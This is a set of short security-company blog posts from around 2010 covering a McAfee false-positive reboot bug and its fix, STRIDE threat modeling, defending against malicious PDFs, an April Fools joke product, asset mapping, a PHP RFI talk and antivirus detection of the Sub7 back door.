McAfee’s Anti-Virus update for today (5958 DAT April 21, 2010) is causing systems to be stuck in an infinite reboot cycle. If your systems have not updated yet, it is highly recommended to prevent them from doing so, disable automatic updates and any pending update tasks.

The issue comes from the update detecting a false positive on systems. It appears that only Windows XP SP3 systems are effected. McAfee detects this false positive in the file C:/WINDOWS/system32/svchost.exe and thinks it contains the W32/Wecorl.a Virus. The machine then enters a reboot cycle.

McAfee has released a temporary fix to suppress the false positive. To use the fix with VirusScan Enterprise Console 8.5i or higher, Access Protection must be first disabled by following this knowledge base article here. (Alternate Google cache page, site is very busy here.)

To correct a machine with this issue, follow these steps:

1. Download the EXTRA.DAT file here. (Or from the KB article)
2. Start the effected machine in Safe Mode
3. Copy the EXTRA.DAT file to the following location:
\Program Files\Common Files\McAfee\Engine
4. Remove svchost.exe from the quarantine.

Threat modeling is a powerful technique that helps characterize higher level threats and separates them into more manageable sub-threats that can be addressed. Threat modeling can help an organization discover the core issue that lies beneath a high level threat, such as a denial of service (DoS).

There are different approaches toward threat modeling. One is to examine an existing application. The other is to evaluate a threat during every stage of the software development lifecycle (SDLC). With our “80/20 Rule of Information Security” project list, we tackle what regulations apply to your company and assess the risks.

For instance, let’s say a regulation requires strong access control measures to be in place. A high-level threat would be when a malicious user escalates privileges. In order to do this, the user would need to bypass the authentication process. With a Risk Management Threat Modeling Project, MSI would analyze the applications to find alternate entry points in order to harden them and ensure that only authorized users have access.

What is important is discovering where threats exist and then developing security solutions to address them. MSI also examines data flow diagrams that charts the system. Once we see the data flows, we can then start looking for vulnerabilities.

We use the STRIDE approach, which stands for: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. With each phase, we carefully examine all of the loopholes that could leave your company’s data exposed. For instance, “spoofing” is pretending to be something you’re not. Many attackers use email to send notices to individuals that may look as though it was coming from a reputable source (like PayPal) but a quick look at the link address would prove otherwise. These attacks now have a name: phishing.

No business wants a Denial of Service. This happens when an attack overloads your server with fake requests so that it crashes the system. MSI’s HoneyPoint Security Server is an excellent way to prevent such attacks from happening.

Tampering attacks can be directed against static data files or network packets. Most developers don’t think about tampering attacks. When reading an XML configuration file, for example, do you carefully check for valid input? Would your program behave badly if that configuration file contained malformed data? These are some of the questions to consider when analyzing for risk.

MSI can help you achieve a more secure posture. Why not give us a call today?

The ubiquitous PDF, it just seems to be everywhere. With all of the recent hype surrounding a variety of exploits that have come to light in the last couple of weeks, many of our customers are asking about how to defend against malicious PDF documents. This is both a simple and a complex question.

The simple answer, and of course the least realistic, is to disallow PDFs altogether. However, as you might already suspect, this is nearly impossible in any modern enterprise. A couple of recent polls in customer enterprises showed that even when staff members said they didn’t use PDFs for anything in their day-to-day work, nearly all of them realized suddenly that PDFs were an important part of some process once PDF documents started to get blocked at the perimeter. Not one single organization that is a client has reported success at blocking PDF documents as a blanket solution.

So, if we can’t block something that may be dangerous, then we are back to that age old game of defense in depth. We’re going to need more than one single control to protect our organization against this attack vector. Sure, almost everyone has antivirus on their workstations and other systems, however, in this case, most antivirus applications show little progress in detecting many malicious PDF attack vectors. But, the good news is, that antivirus is as effective as usual at detecting the second stage of a malicious PDF attack, which usually involves the installation of malware. Some organizations have also started to deploy PDF specific heuristic-based solutions in their email scanners, web content scanners, firewalls and IDS/IPS systems. While these technical controls each have varying levels of strengths and weaknesses, when meshed together they do a pretty good job of giving you some detective and maybe preventative capability for specific known attack vectors using PDFs.

Obviously, you want to back up these technical controls with some additional human training, education and awareness. You want users to understand that a PDF can be as dangerous, if not more so, than many other common attachments. Many of the users we have talked to in the last few weeks have been surprised by the fact that PDFs could execute remote code or be harmful. It seems that many users trust PDF documents a lot more than they should. Given how many of the new PDF exploits work, it is a good idea to make your users aware they they should pay careful attention to any pop-up messages in the PDF reader and that if they are unsure about a message they should seek assistance before accepting or hitting OK/Continue.

Lastly, PDF attacks like the current ones in circulation, continue to show the importance of many of the projects in our 80/20 Rule of Information Security. By leveraging projects such as anomaly detection and enclave computing, organizations can not only reduce the damage that a successful client side attack can do, but they can give themselves a leg up on identifying them, blocking their sources and quarantining their victims. If you would like to discuss some of these approaches, please drop me a line or give us a call.

What approaches to PDF security has your organization found to be effective? If you have a winning strategy or tactic, leave us a comment below. As always, thanks for reading and be careful out there.

That’s right! No longer do you have to spend days and nights worrying about the state of your network. No more fretting about your partners, security or other traditional concerns.

Today is the dawn of a new day for network engineers around the globe!

Want to know how your network is? ASK YOUR PACKETS!!!!!

MicroSolved’s revolutionary new product, code named, NED or Network Emotion Detector, will continually update you on the emotional health of your packets. If there’s a network problem, a security breach or if you happen to fall out of compliance with the Pennsylvania Concrete Institute’s (PCI) standards, your NED will immediately alert your team to the lack of happiness being experienced by your packets as they traverse the various public and private networks!

Even more powerful than the executive dashboard, the GUI can be operated near the data center hallway window, so passing executives can quickly identify the happiness quotient (TM) of your network. When they see NED smiling, they will know you are doing your job well. When NED is unhappy and your packets begin to show signs of sadness, they can quickly and easily purchase additional “emotional credits” through the handy interface. These emotional credits (ie: money) make your packets happy and joyous as they traverse the Intertubes.

If that were all NED did, it would still be the most powerful network emotional monitoring tool on the market, but we even take it one step further! Using NED’s soon to be copylefted capabilities, we create emotional tunnels for your packets to move back and forth with your peers. These “Virtual Private Hugs” (VPH) allow you and your business partners to mutually enjoy all the power of NED and emotional credits together. You can easily monitor the happiness of your partner’s packets and those that show emotional disparity, making VPH even more important for those folks. Lastly, NED features a peer-to-peer network monitoring mechanism that allows you to closely monitor the overall happiness level around the Cloud. That’s right, MSI is the first in the world to create Happiness as a Service (HaaS)(TM)!

Act now and you can get your own copy of NED for Windows FREE for a limited time. Download from here and start enjoying the ease and joy of NED from MSI. We hope you enjoy NED, “because packets need love too…”

Happy April Fools Day from your security partners at MicroSolved, Inc. We hope it made you smile. BTW – The download really runs. Windows only, for now…. :p

In order to know what your organization needs for security, you first need to define what you have. Many times, this task of defining and organizing can be intimidating, especially if it has been a long time since someone did it. However, with a mind mapping tool, such as Inspiration or the free tool, XMind – pulling together your assets will come together quickly.

It is important to define a “Who, What, Where” when assessing your environment. Who has access? What programs are running and on which machines are they running? Where does the data reside that could be compromised? How is the environment secured?

Creating a map will allow you to easily follow relationships so you will then be able to assign tasks accordingly. Also, when you create a map, it will visibly reveal relationships that previously were unseen or unnoticed.

As the various network relationships are mapped out, it will be easier to see what would be affected in your enterprise should a data breach occur.

If Server A is compromised, incident responders can quickly assess what other components may have been affected by reviewing its trust relationships. Having a clear depiction of component dependencies eases the re-architecture process allowing for faster, more efficient upgrades. Creating a physical map in accordance with data flow and trust relationships ensures that components are not forgotten.

Finally, categorizing system functions eases the enslaving process. So mind map your way to security and reach your destination of a safer enterprise.

Thanks to the folks who joined us for this afternoon’s PHP security talk about modern RFI attacks, how they work and what attackers are up to. If you are interested in the new slide deck, you can find them here: http://bit.ly/bT2TF7

If you would like to attend a virtual presentation or book one of our engineers to give the talk for your development team (either virtually or face to face), drop me a line and let me know. The talk is very strong and lends itself well to understanding how PHP RFI has become one of the most common attack vectors in use to spread malware, bots and other illicit activity.

In the last few days, the folks that make sub7, a pretty common and well known Windows back door/remote access tool, released a new version. You can find more about the capabilities of this application here.

Since I have been doing a bit of research lately that has included anti-virus and their often abysmal detection rates, I decided to test this new version of Sub7 against the VirusTotal scanning base. You can find the results here.

As you can see, the detection rates for this “remote access tool” is just under 55%. This time, all three of the major enterprise vendor products catch the malware nature, but the most common free tool, AVG, misses it entirely. As such, organizations are likely protected, but a vast many home user and consumer machines will be unable to detect the install of this very common attacker tool.

As with many of the posts about this in the past, I simply point this out to folks to help them come to an understanding of the true levels of protection that AV offers. Many people see it as a panacea, but clearly, it is not. AV is a needed part of defense in depth, but additional controls and security tools are required to create effective detection for malware infections.

Our CEO and Security Evangelist, Brent Huston, shares tips and strategies for keeping your data safe in this downloadable PDF.

Data Security Offers Peace of Mind